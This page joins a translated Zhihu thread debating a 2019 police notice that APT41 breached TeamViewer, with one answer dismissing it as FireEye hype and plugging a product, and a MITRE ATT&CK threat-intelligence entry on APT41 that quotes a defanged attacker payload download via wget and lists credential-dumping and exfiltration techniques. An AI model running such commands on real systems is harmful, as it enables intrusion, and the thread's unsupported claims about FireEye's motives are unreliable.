How should we view the Shenzhen Network Information Security Center's notice that TeamViewer was attacked by APT41? - Zhihu

Question: How should we view the Shenzhen Network Information Security Center's notice that TeamViewer was attacked by APT41? [image] How serious is the damage this time? What should ordinary people do?
Followers: 290 · Views: 151,884 · 44 answers

Answer by 云子可信 (Yunzi Kexin, "Enterprise IT has never been this simple"):

TeamViewer hacked? Please look at the whole incident calmly.

The Shenzhen internet police posted on Weibo an "Emergency Notice on TeamViewer Clients Being Remotely Controlled", stating that the overseas hacker group APT41 had recently carried out a cyber attack on TeamViewer and successfully taken over TeamViewer's back-end management system, allowing the group to access and control any client with TeamViewer installed.

[image: Weibo post by the Shenzhen internet police on 12 October]

In fact, as early as the 11th, the Shenzhen internet police had already issued a notice document that also disclosed how to deal with the incident; a screenshot of the document is below:

[image: screenshot of the notice document]

The severity of the incident is extremely high, and Baike also disclosed it right away.

TeamViewer is a household name and its features need no introduction. While it serves individual users, it is in fact aimed more at enterprise users, who use it for all kinds of remote operations. If TeamViewer were compromised, hackers could freely steal information from any company that uses TeamViewer as its remote tool; once a company's confidential information leaks, the consequences are obvious. The story was reposted frantically across major forums and portals.

Network administrators at every company were on edge, and for a while TeamViewer uninstall prompts were popping up everywhere.

Yunzi works in the cyber security industry and is extremely sensitive to this kind of event. Yunzi remembers first seeing the name of this so-called hacker group APT41 in a news item from the US security company FireEye, around August 2019, in which FireEye claimed that APT41 is a hacker group from China that since 2012 has been devoted to attacking 14 countries and regions including the US, the UK and Hong Kong. Given overseas attitudes toward China, this attack should already have blown up abroad, so Yunzi went to take a look.

The result: everything was normal.

TeamViewer had not officially issued any related security warning.

If a serious security problem occurred, TeamViewer would have to notify all users early and in advance; this is a clause that necessarily exists in the security agreement of any enterprise-grade product. If a security crisis arose and TeamViewer handled it improperly, it would face huge compensation claims on top of the damage to its brand reputation. (There is no scenario in which TeamViewer would hide an attack and not report it.)

Yunzi still was not satisfied and searched carefully again on some "non-existent" websites; the result was that all the information about TeamViewer being attacked came from the notice document issued by the Shenzhen internet police.

Just as Yunzi wanted to re-check that Weibo notice from the Shenzhen internet police, the post could no longer be found.

[image: Shenzhen internet police Weibo]

The Shenzhen internet police had deleted the Weibo notice about TeamViewer being attacked.

Yunzi began to doubt whether this attack was real, and searched domestically again for information about the attack. Yunzi found that the earliest report of the attack came from a Twitter user, Christopher Glyer, a security architect at the US security company FireEye.

[image: screenshot of the poster's profile]

Below is the information this poster published about TeamViewer being attacked:

[image: screenshot of the tweet]

This is the only content.

The screenshot Christopher Glyer posted is one of 17 slides from a FireEye security conference talk. This slide alone cannot confirm that TeamViewer was hacked, and Christopher Glyer did not respond to other Twitter users' questions, declining to disclose any related information on the grounds that he could not reveal victim details.

FireEye has never been a security company with a good reputation, and judging by FireEye's usual style, Yunzi speculates that this incident is very likely a misleading news item FireEye released to hype its own security products; the Shenzhen internet police misunderstood the information, and the result was a big blunder.

May everyone view sudden events calmly.

Yunzi also recommends our own remote product, Yunzi Kexin endpoint management software; anyone interested can visit the official website for details.

Edited 2019-12-16 17:32 · 180 upvotes · 36 comments

Answer by 火绒安全 (Huorong Security, verified account):

At the security conference held by FireEye on the 11th, a photo of a presentation slide was published by a third party with the caption "TeamViewer was once breached by the hacker group APT41, and the group can access any system with TeamViewer installed", which drew attention. Huorong also received many inquiries from users; after looking into the whole incident, we have put together a rough summary.

Based on the photo circulating online, Huorong engineers located FireEye's report (see image below) and found that the caption attached to the photo does not match what FireEye's slide actually says:

[image: FireEye slide]

1. According to FireEye's report, they do not have direct evidence that APT41 breached TeamViewer the company. The photo circulating online only shows that FireEye observed APT41 using TeamViewer login credentials to log on to attacked hosts during 2017-2018.

2. According to FireEye's slide, TeamViewer the company was breached by hackers in 2016 (as reported by other media). At the time TeamViewer also responded to the breach, stating that it had found no evidence of data being leaked.

Summary: Based on the available information, neither in timing nor in logic is there a necessary connection between the 2017-2018 "use of TeamViewer login credentials" FireEye observed and the 2016 attack on TeamViewer, and there is no way to prove that TeamViewer was recently attacked and user systems accessed. TeamViewer users therefore need not worry excessively; Huorong will keep following the development of this incident.

Security recommendations:
1. Open remote-control software only when needed, to avoid the risk of potential vulnerabilities being exploited by hackers;
2. Follow the vendor's patch announcements for the software and keep it updated promptly;
3. Users of Huorong Enterprise Edition can use "Huorong Enterprise Edition" > "Remote Desktop" instead.

Finally, Huorong will continue to follow the development of this incident and report more related information as it comes.

Published 2019-10-12 17:42 · 125 upvotes · 10 comments
APT41, Wicked Panda, Group G0096 | MITRE ATT&CK®
APT41
APT41 is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[1][2]
ID: G0096
Associated Groups: Wicked Panda
Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet
Version: 3.1
Created: 23 September 2019
Last Modified: 23 March 2023
Associated Group Descriptions
Wicked Panda: [3]
Campaigns
C0017 (C0017): First Seen May 2021 [4]; Last Seen February 2022 [4]; References [4]. Techniques:
Access Token Manipulation,
Application Layer Protocol: Web Protocols,
Archive Collected Data: Archive via Custom Method,
Command and Scripting Interpreter: JavaScript,
Command and Scripting Interpreter: Windows Command Shell,
Data from Local System,
Data Obfuscation: Protocol Impersonation,
Data Staged: Local Data Staging,
Deobfuscate/Decode Files or Information,
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,
Exfiltration Over C2 Channel,
Exfiltration Over Web Service,
Exploit Public-Facing Application,
Exploitation for Privilege Escalation,
Hijack Execution Flow,
Ingress Tool Transfer,
Masquerading: Masquerade Task or Service,
Masquerading: Match Legitimate Name or Location,
Obfuscated Files or Information: Software Packing,
Obfuscated Files or Information,
Obtain Capabilities: Tool,
OS Credential Dumping: Security Account Manager,
Proxy,
Scheduled Task/Job: Scheduled Task,
Server Software Component: Web Shell,
System Information Discovery,
System Network Configuration Discovery,
System Owner/User Discovery,
Web Service: Dead Drop Resolver,
Web Service
Techniques Used (columns: Domain, ID, Name, Use)
Enterprise
T1134
Access Token Manipulation
During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.[4]
Enterprise
T1098
Account Manipulation
APT41 has added user accounts to the User and Admin groups.[1]
Enterprise
T1071
.001
Application Layer Protocol: Web Protocols
APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[5] During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[4]
.002
Application Layer Protocol: File Transfer Protocols
APT41 used exploit payloads that initiate download via ftp.[5]
.004
Application Layer Protocol: DNS
APT41 used DNS for C2 communications.[1][2]
Enterprise
T1560
.001
Archive Collected Data: Archive via Utility
APT41 created a RAR archive of targeted files for exfiltration.[1]
.003
Archive Collected Data: Archive via Custom Method
During C0017, APT41 hex-encoded PII data prior to exfiltration.[4]
Enterprise
T1197
BITS Jobs
APT41 used BITSAdmin to download and install payloads.[5][3]
Enterprise
T1547
.001
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
APT41 created and modified startup files for persistence.[1][2] APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.[5]
Enterprise
T1110
.002
Brute Force: Password Cracking
APT41 performed password brute-force attacks on the local admin account.[1]
Enterprise
T1059
.001
Command and Scripting Interpreter: PowerShell
APT41 leveraged PowerShell to deploy malware families in victims’ environments.[1][5]
.003
Command and Scripting Interpreter: Windows Command Shell
APT41 used cmd.exe /c to execute commands on remote machines.[1] APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.[5] During C0017, APT41 used cmd.exe to execute reconnaissance commands.[4]
.004
Command and Scripting Interpreter: Unix Shell
APT41 executed file /bin/pwd in activity exploiting CVE-2019-19781 against Citrix devices.[5]
.007
Command and Scripting Interpreter: JavaScript
During C0017, APT41 deployed JScript web shells on compromised systems.[4]
Enterprise
T1136
.001
Create Account: Local Account
APT41 has created user accounts.[1]
Enterprise
T1543
.003
Create or Modify System Process: Windows Service
APT41 modified legitimate Windows services to install malware backdoors.[1][2] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[5]
Enterprise
T1486
Data Encrypted for Impact
APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[1]
Enterprise
T1005
Data from Local System
APT41 has uploaded files and data from a compromised host.[2] During C0017, APT41 collected information related to compromised machines as well as Personally Identifiable Information (PII) from victim networks.[4]
Enterprise
T1001
.003
Data Obfuscation: Protocol Impersonation
During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[4]
Enterprise
T1074
.001
Data Staged: Local Data Staging
During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.[4]
Enterprise
T1140
Deobfuscate/Decode Files or Information
During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[4]
Enterprise
T1568
.002
Dynamic Resolution: Domain Generation Algorithms
APT41 has used DGAs to change their C2 servers monthly.[1]
Enterprise
T1546
.008
Event Triggered Execution: Accessibility Features
APT41 leveraged sticky keys to establish persistence.[1]
Enterprise
T1480
.001
Execution Guardrails: Environmental Keying
APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.[6]
Enterprise
T1048
.003
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[4]
Enterprise
T1041
Exfiltration Over C2 Channel
During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[4]
Enterprise
T1567
Exfiltration Over Web Service
During C0017, APT41 used Cloudflare services for data exfiltration.[4]
Enterprise
T1190
Exploit Public-Facing Application
APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[5] During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[4]
Enterprise
T1203
Exploitation for Client Execution
APT41 leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[1]
Enterprise
T1068
Exploitation for Privilege Escalation
During C0017, APT41 abused named pipe impersonation for privilege escalation.[4]
Enterprise
T1133
External Remote Services
APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[1]
Enterprise
T1008
Fallback Channels
APT41 used the Steam community page as a fallback mechanism for C2.[1]
Enterprise
T1083
File and Directory Discovery
APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.[5]
Enterprise
T1574
.001
Hijack Execution Flow: DLL Search Order Hijacking
APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.[3]
.002
Hijack Execution Flow: DLL Side-Loading
APT41 used legitimate executables to perform DLL side-loading of their malware.[1]
.006
Hijack Execution Flow: Dynamic Linker Hijacking
APT41 has configured payloads to load via LD_PRELOAD.[3]
Enterprise
T1070
.001
Indicator Removal: Clear Windows Event Logs
APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[1]
.003
Indicator Removal: Clear Command History
APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[1]
.004
Indicator Removal: File Deletion
APT41 deleted files from the system.[1]
Enterprise
T1105
Ingress Tool Transfer
APT41 used certutil to download additional files.[5][3][2] During C0017, APT41 downloaded malicious payloads onto compromised systems.[4]
Enterprise
T1056
.001
Input Capture: Keylogging
APT41 used a keylogger called GEARSHIFT on a target system.[1]
Enterprise
T1036
.004
Masquerading: Masquerade Task or Service
APT41 has created services to appear as benign system tools.[2] During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.[4]
.005
Masquerading: Match Legitimate Name or Location
APT41 attempted to masquerade their files as popular anti-virus software.[1][2] During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx, likely to avoid hunting detections.[4]
Enterprise
T1112
Modify Registry
APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[1][2]
Enterprise
T1104
Multi-Stage Channels
APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[5]
Enterprise
T1046
Network Service Discovery
APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[1]
Enterprise
T1135
Network Share Discovery
APT41 used the net share command as part of network reconnaissance.[1][2]
Enterprise
T1027
Obfuscated Files or Information
APT41 used VMProtected binaries in multiple intrusions.[5] During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[4]
.002
Software Packing
During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[4]
Enterprise
T1588
.002
Obtain Capabilities: Tool
APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[1] For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[4]
Enterprise
T1003
.001
OS Credential Dumping: LSASS Memory
APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[1][2]
.002
OS Credential Dumping: Security Account Manager
During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.[4]
Enterprise
T1566
.001
Phishing: Spearphishing Attachment
APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[1]
Enterprise
T1542
.003
Pre-OS Boot: Bootkit
APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[1]
Enterprise
T1055
Process Injection
APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[1]
Enterprise
T1090
Proxy
APT41 used a tool called CLASSFON to covertly proxy network communications.[1] During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[4]
Enterprise
T1021
.001
Remote Services: Remote Desktop Protocol
APT41 used RDP for lateral movement.[1][3]
.002
Remote Services: SMB/Windows Admin Shares
APT41 has transferred implant files using Windows Admin Shares.[3]
Enterprise
T1496
Resource Hijacking
APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[1]
Enterprise
T1014
Rootkit
APT41 deployed rootkits on Linux systems.[1][3]
Enterprise
T1053
.005
Scheduled Task/Job: Scheduled Task
APT41 used a compromised account to create a scheduled task on a system.[1][3] During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.[4]
Enterprise
T1505
.003
Server Software Component: Web Shell
During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[4]
Enterprise
T1553
.002
Subvert Trust Controls: Code Signing
APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[1][2]
Enterprise
T1195
.002
Supply Chain Compromise: Compromise Software Supply Chain
APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[1]
Enterprise
T1218
.001
System Binary Proxy Execution: Compiled HTML File
APT41 used compiled HTML (.chm) files for targeting.[1]
.011
System Binary Proxy Execution: Rundll32
APT41 has used rundll32.exe to execute a loader.[3]
Enterprise
T1082
System Information Discovery
During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.[4]
Enterprise
T1016
System Network Configuration Discovery
APT41 collected MAC addresses from victim machines.[1][2] During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.[4]
Enterprise
T1049
System Network Connections Discovery
APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.[1][2]
Enterprise
T1033
System Owner/User Discovery
APT41 used the WMIEXEC utility to execute whoami commands on remote machines.[1] During C0017, APT41 used whoami to gather information from victim machines.[4]
Enterprise
T1569
.002
System Services: Service Execution
APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[5][2]
Enterprise
T1078
Valid Accounts
APT41 used compromised credentials to log on to other systems.[1][3]
Enterprise
T1102
.001
Web Service: Dead Drop Resolver
APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[1] During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably, APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[4]
Enterprise
T1047
Windows Management Instrumentation
APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[1][2]
Software (columns: ID, Name, References, Techniques)
S0073
ASPXSpy
[1]
Server Software Component: Web Shell
S0190
BITSAdmin
[5]
BITS Jobs,
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,
Ingress Tool Transfer,
Lateral Tool Transfer
S0069
BLACKCOFFEE
[1]
Command and Scripting Interpreter: Windows Command Shell,
File and Directory Discovery,
Indicator Removal: File Deletion,
Multi-Stage Channels,
Process Discovery,
Web Service: Dead Drop Resolver,
Web Service: Bidirectional Communication
S0160
certutil
[5]
Archive Collected Data: Archive via Utility,
Deobfuscate/Decode Files or Information,
Ingress Tool Transfer,
Subvert Trust Controls: Install Root Certificate
S0020
China Chopper
[1]
Application Layer Protocol: Web Protocols,
Brute Force: Password Guessing,
Command and Scripting Interpreter: Windows Command Shell,
Data from Local System,
File and Directory Discovery,
Indicator Removal: Timestomp,
Ingress Tool Transfer,
Network Service Discovery,
Obfuscated Files or Information: Software Packing,
Server Software Component: Web Shell
S0154
Cobalt Strike
[5][2]
Abuse Elevation Control Mechanism: Sudo and Sudo Caching,
Abuse Elevation Control Mechanism: Bypass User Account Control,
Access Token Manipulation: Parent PID Spoofing,
Access Token Manipulation: Token Impersonation/Theft,
Access Token Manipulation: Make and Impersonate Token,
Account Discovery: Domain Account,
Application Layer Protocol: DNS,
Application Layer Protocol: Web Protocols,
Application Layer Protocol: File Transfer Protocols,
BITS Jobs,
Browser Session Hijacking,
Command and Scripting Interpreter: JavaScript,
Command and Scripting Interpreter: Visual Basic,
Command and Scripting Interpreter: PowerShell,
Command and Scripting Interpreter: Python,
Command and Scripting Interpreter: Windows Command Shell,
Create or Modify System Process: Windows Service,
Data Encoding: Standard Encoding,
Data from Local System,
Data Obfuscation: Protocol Impersonation,
Data Transfer Size Limits,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Asymmetric Cryptography,
Encrypted Channel: Symmetric Cryptography,
Exploitation for Client Execution,
Exploitation for Privilege Escalation,
File and Directory Discovery,
Hide Artifacts: Process Argument Spoofing,
Impair Defenses: Disable or Modify Tools,
Indicator Removal: Timestomp,
Ingress Tool Transfer,
Input Capture: Keylogging,
Modify Registry,
Native API,
Network Service Discovery,
Network Share Discovery,
Non-Application Layer Protocol,
Obfuscated Files or Information: Indicator Removal from Tools,
Obfuscated Files or Information,
Office Application Startup: Office Template Macros,
OS Credential Dumping: LSASS Memory,
OS Credential Dumping: Security Account Manager,
Permission Groups Discovery: Domain Groups,
Permission Groups Discovery: Local Groups,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Process Injection: Process Hollowing,
Process Injection,
Protocol Tunneling,
Proxy: Domain Fronting,
Proxy: Internal Proxy,
Query Registry,
Reflective Code Loading,
Remote Services: Remote Desktop Protocol,
Remote Services: SSH,
Remote Services: Windows Remote Management,
Remote Services: SMB/Windows Admin Shares,
Remote Services: Distributed Component Object Model,
Remote System Discovery,
Scheduled Transfer,
Screen Capture,
Software Discovery,
Subvert Trust Controls: Code Signing,
System Binary Proxy Execution: Rundll32,
System Network Configuration Discovery,
System Network Connections Discovery,
System Service Discovery,
System Services: Service Execution,
Use Alternate Authentication Material: Pass the Hash,
Valid Accounts: Domain Accounts,
Valid Accounts: Local Accounts,
Windows Management Instrumentation
S1052
DEADEYE
[4]
Command and Scripting Interpreter: Windows Command Shell,
Deobfuscate/Decode Files or Information,
Execution Guardrails,
Hide Artifacts: NTFS File Attributes,
Masquerading: Masquerade Task or Service,
Native API,
Obfuscated Files or Information,
Obfuscated Files or Information: Embedded Payloads,
Scheduled Task/Job,
System Binary Proxy Execution: Msiexec,
System Binary Proxy Execution: Rundll32,
System Information Discovery,
System Network Configuration Discovery
S0021
Derusbi
[1]
Audio Capture,
Command and Scripting Interpreter: Unix Shell,
Encrypted Channel: Symmetric Cryptography,
Fallback Channels,
File and Directory Discovery,
Indicator Removal: Timestomp,
Indicator Removal: File Deletion,
Input Capture: Keylogging,
Non-Application Layer Protocol,
Non-Standard Port,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Query Registry,
Screen Capture,
System Binary Proxy Execution: Regsvr32,
System Information Discovery,
System Owner/User Discovery,
Video Capture
S0105
dsquery
[4]
Account Discovery: Domain Account,
Domain Trust Discovery,
Permission Groups Discovery: Domain Groups,
System Information Discovery
S0363
Empire
[3]
Abuse Elevation Control Mechanism: Bypass User Account Control,
Access Token Manipulation: SID-History Injection,
Access Token Manipulation,
Access Token Manipulation: Create Process with Token,
Account Discovery: Domain Account,
Account Discovery: Local Account,
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,
Application Layer Protocol: Web Protocols,
Archive Collected Data,
Automated Collection,
Automated Exfiltration,
Boot or Logon Autostart Execution: Security Support Provider,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Boot or Logon Autostart Execution: Shortcut Modification,
Browser Information Discovery,
Clipboard Data,
Command and Scripting Interpreter: PowerShell,
Command and Scripting Interpreter: Windows Command Shell,
Command and Scripting Interpreter,
Create Account: Local Account,
Create Account: Domain Account,
Create or Modify System Process: Windows Service,
Credentials from Password Stores: Credentials from Web Browsers,
Domain Policy Modification: Group Policy Modification,
Domain Trust Discovery,
Email Collection: Local Email Collection,
Encrypted Channel: Asymmetric Cryptography,
Event Triggered Execution: Accessibility Features,
Exfiltration Over C2 Channel,
Exfiltration Over Web Service: Exfiltration to Code Repository,
Exfiltration Over Web Service: Exfiltration to Cloud Storage,
Exploitation for Privilege Escalation,
Exploitation of Remote Services,
File and Directory Discovery,
Group Policy Discovery,
Hijack Execution Flow: Path Interception by Unquoted Path,
Hijack Execution Flow: Path Interception by Search Order Hijacking,
Hijack Execution Flow: Path Interception by PATH Environment Variable,
Hijack Execution Flow: Dylib Hijacking,
Hijack Execution Flow: DLL Search Order Hijacking,
Indicator Removal: Timestomp,
Ingress Tool Transfer,
Input Capture: Keylogging,
Input Capture: Credential API Hooking,
Native API,
Network Service Discovery,
Network Share Discovery,
Network Sniffing,
Obfuscated Files or Information: Command Obfuscation,
OS Credential Dumping: LSASS Memory,
Process Discovery,
Process Injection,
Remote Services: Distributed Component Object Model,
Remote Services: SSH,
Scheduled Task/Job: Scheduled Task,
Screen Capture,
Software Discovery: Security Software Discovery,
Steal or Forge Kerberos Tickets: Kerberoasting,
Steal or Forge Kerberos Tickets: Golden Ticket,
Steal or Forge Kerberos Tickets: Silver Ticket,
System Information Discovery,
System Network Configuration Discovery,
System Network Connections Discovery,
System Owner/User Discovery,
System Services: Service Execution,
Trusted Developer Utilities Proxy Execution: MSBuild,
Unsecured Credentials: Credentials In Files,
Unsecured Credentials: Private Keys,
Use Alternate Authentication Material: Pass the Hash,
Video Capture,
Web Service: Bidirectional Communication,
Windows Management Instrumentation
S0095
ftp
[5]
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol,
Ingress Tool Transfer,
Lateral Tool Transfer
S0032
gh0st RAT
[1]
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Command and Scripting Interpreter,
Create or Modify System Process: Windows Service,
Data Encoding: Standard Encoding,
Deobfuscate/Decode Files or Information,
Dynamic Resolution: Fast Flux DNS,
Encrypted Channel: Symmetric Cryptography,
Encrypted Channel,
Hijack Execution Flow: DLL Side-Loading,
Indicator Removal: Clear Windows Event Logs,
Indicator Removal: File Deletion,
Ingress Tool Transfer,
Input Capture: Keylogging,
Modify Registry,
Native API,
Non-Application Layer Protocol,
Process Discovery,
Process Injection,
Query Registry,
Screen Capture,
Shared Modules,
System Binary Proxy Execution: Rundll32,
System Information Discovery,
System Services: Service Execution
S0100
ipconfig
[2]
System Network Configuration Discovery
S1051
KEYPLUG
[4]
Application Layer Protocol: Web Protocols,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Asymmetric Cryptography,
Non-Application Layer Protocol,
Obfuscated Files or Information,
Proxy,
System Time Discovery,
Web Service: Dead Drop Resolver
S0443
MESSAGETAP
[7][3]
Archive Collected Data: Archive via Custom Method,
Automated Collection,
Data Staged: Local Data Staging,
Deobfuscate/Decode Files or Information,
File and Directory Discovery,
Indicator Removal: File Deletion,
Network Sniffing,
System Network Connections Discovery
S0002
Mimikatz
[1][2]
Access Token Manipulation: SID-History Injection,
Account Manipulation,
Boot or Logon Autostart Execution: Security Support Provider,
Credentials from Password Stores,
Credentials from Password Stores: Credentials from Web Browsers,
Credentials from Password Stores: Windows Credential Manager,
OS Credential Dumping: DCSync,
OS Credential Dumping: Security Account Manager,
OS Credential Dumping: LSASS Memory,
OS Credential Dumping: LSA Secrets,
Rogue Domain Controller,
Steal or Forge Authentication Certificates,
Steal or Forge Kerberos Tickets: Golden Ticket,
Steal or Forge Kerberos Tickets: Silver Ticket,
Unsecured Credentials: Private Keys,
Use Alternate Authentication Material: Pass the Hash,
Use Alternate Authentication Material: Pass the Ticket
S0039
Net
[1]
Account Discovery: Domain Account,
Account Discovery: Local Account,
Create Account: Local Account,
Create Account: Domain Account,
Indicator Removal: Network Share Connection Removal,
Network Share Discovery,
Password Policy Discovery,
Permission Groups Discovery: Domain Groups,
Permission Groups Discovery: Local Groups,
Remote Services: SMB/Windows Admin Shares,
Remote System Discovery,
System Network Connections Discovery,
System Service Discovery,
System Services: Service Execution,
System Time Discovery
S0104
netstat
[1]
System Network Connections Discovery
S0385
njRAT
[1]
Application Layer Protocol: Web Protocols,
Application Window Discovery,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Command and Scripting Interpreter: PowerShell,
Command and Scripting Interpreter: Windows Command Shell,
Credentials from Password Stores: Credentials from Web Browsers,
Data Encoding: Standard Encoding,
Data from Local System,
Dynamic Resolution: Fast Flux DNS,
Exfiltration Over C2 Channel,
File and Directory Discovery,
Impair Defenses: Disable or Modify System Firewall,
Indicator Removal: File Deletion,
Indicator Removal: Clear Persistence,
Ingress Tool Transfer,
Input Capture: Keylogging,
Modify Registry,
Native API,
Non-Standard Port,
Obfuscated Files or Information,
Obfuscated Files or Information: Compile After Delivery,
Peripheral Device Discovery,
Process Discovery,
Query Registry,
Remote Services: Remote Desktop Protocol,
Remote System Discovery,
Replication Through Removable Media,
Screen Capture,
System Information Discovery,
System Owner/User Discovery,
Video Capture
S0097
Ping
[1][2]
Remote System Discovery
S0013
PlugX
[1]
Application Layer Protocol: Web Protocols,
Application Layer Protocol: DNS,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Command and Scripting Interpreter: Windows Command Shell,
Create or Modify System Process: Windows Service,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Symmetric Cryptography,
File and Directory Discovery,
Hide Artifacts: Hidden Files and Directories,
Hijack Execution Flow: DLL Side-Loading,
Hijack Execution Flow: DLL Search Order Hijacking,
Ingress Tool Transfer,
Input Capture: Keylogging,
Masquerading: Masquerade Task or Service,
Masquerading: Match Legitimate Name or Location,
Modify Registry,
Native API,
Network Share Discovery,
Non-Application Layer Protocol,
Obfuscated Files or Information,
Process Discovery,
Query Registry,
Screen Capture,
System Network Connections Discovery,
Trusted Developer Utilities Proxy Execution: MSBuild,
Virtualization/Sandbox Evasion: System Checks,
Web Service: Dead Drop Resolver
S0194
PowerSploit
[1]
Access Token Manipulation,
Account Discovery: Local Account,
Audio Capture,
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,
Boot or Logon Autostart Execution: Security Support Provider,
Command and Scripting Interpreter: PowerShell,
Create or Modify System Process: Windows Service,
Credentials from Password Stores: Windows Credential Manager,
Data from Local System,
Domain Trust Discovery,
Hijack Execution Flow: Path Interception by PATH Environment Variable,
Hijack Execution Flow: Path Interception by Unquoted Path,
Hijack Execution Flow: DLL Search Order Hijacking,
Hijack Execution Flow: Path Interception by Search Order Hijacking,
Input Capture: Keylogging,
Obfuscated Files or Information: Indicator Removal from Tools,
Obfuscated Files or Information: Command Obfuscation,
OS Credential Dumping: LSASS Memory,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Query Registry,
Reflective Code Loading,
Scheduled Task/Job: Scheduled Task,
Screen Capture,
Steal or Forge Kerberos Tickets: Kerberoasting,
Unsecured Credentials: Credentials in Registry,
Unsecured Credentials: Group Policy Preferences,
Windows Management Instrumentation
S0006 pwdump [1]
OS Credential Dumping: Security Account Manager
S0112 ROCKBOOT [1]
Pre-OS Boot: Bootkit
S0596 ShadowPad [1][8]
Application Layer Protocol: DNS,
Application Layer Protocol: File Transfer Protocols,
Application Layer Protocol: Web Protocols,
Data Encoding: Non-Standard Encoding,
Deobfuscate/Decode Files or Information,
Dynamic Resolution: Domain Generation Algorithms,
Indicator Removal,
Ingress Tool Transfer,
Modify Registry,
Non-Application Layer Protocol,
Obfuscated Files or Information: Fileless Storage,
Obfuscated Files or Information,
Process Discovery,
Process Injection,
